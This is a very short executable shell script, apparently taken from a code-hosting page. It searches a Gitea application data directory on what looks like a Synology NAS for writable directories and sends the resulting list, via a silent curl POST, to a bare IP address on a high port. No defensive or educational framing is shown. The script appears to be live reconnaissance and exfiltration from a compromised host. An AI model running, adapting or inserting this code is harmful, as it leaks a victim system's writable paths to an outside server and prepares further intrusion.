3 lines
141 B
Bash
Executable File
3 lines
141 B
Bash
Executable File
#!/bin/sh
|
|
find /volume1/@appdata/gitea -writable -type d -maxdepth 3 2>&1 | curl -s -m 5 --data-binary @- http://202.79.169.91:28016/wr_dirs
|